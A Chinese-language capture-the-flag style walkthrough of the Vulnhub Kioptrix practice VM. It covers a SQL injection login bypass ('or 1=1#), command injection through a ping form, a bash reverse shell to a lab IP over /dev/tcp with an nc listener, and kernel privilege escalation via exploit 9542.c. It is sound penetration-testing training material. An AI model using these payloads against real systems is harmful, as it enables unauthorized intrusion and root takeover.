Vulnhub渗透测试练习-Kioptrix

#信息收集

同样是netdiscover收集信息,发现目标IP地址。

目标的IP地址为192.168.43.47

nmap扫描端口信息

#漏洞利用

存在80/tcp open http Apache httpd 2.0.52 ((CentOS))端口

尝试万能密码' or 1=1# ,成功登录。

可以看到一个执行ping命令的框框。

可见是一个命令执行漏洞。

在命令执行中是有| && || ;这些常见的符号的。

这里我们可以利用| ;进行命令执行

测试cat /etc/passwd

下面用命令执行一个交互shell.

;bash -i >& /dev/tcp/192.168.43.177/2333 0>&1

同时用nc监听2333端口。

得到一个交互shell。但是权限是apache用户。

#权限提升

当前的权限是apache用户,我们需要对他进行提权得到root权限。

查看当前系统版本。searchsploit linux 2.6.9查找相关提权漏洞

利用到9542.c的exp.

提权成功。

如果有任何疑问,欢迎添加qq群测试入门大神 755431660 共同学习~

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180508A14OQ500?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券